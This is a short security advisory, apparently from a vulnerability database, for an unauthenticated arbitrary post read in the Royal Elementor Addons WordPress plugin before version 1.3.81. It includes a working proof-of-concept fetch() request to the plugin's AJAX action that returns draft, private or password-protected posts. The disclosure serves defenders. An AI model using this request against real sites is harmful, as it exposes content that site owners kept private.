Royal Elementor Addons and Templates < 1.3.81 - Unauthenticated Arbitrary Post Read

Description The plugin does not ensure that users accessing posts via an AJAX action (and REST endpoint, currently disabled in the plugin) have the right to do so, allowing unauthenticated users to access arbitrary draft, private and password protected posts/pages content

PoC

WooCommerce needs to be installed and activated. Then, run the below command in the developer console of the web browser while being on the blog as unauthenticated user (4 being the ID of a Draft, Private or Password protected post) (await fetch(“/wp-admin/admin-ajax.php?action=wpr_get_page_content”, { “headers”: { “content-type”: “application/x-www-form-urlencoded”, }, “body”: “wpr_compare_page_id=4”, “method”: “POST”, })).text();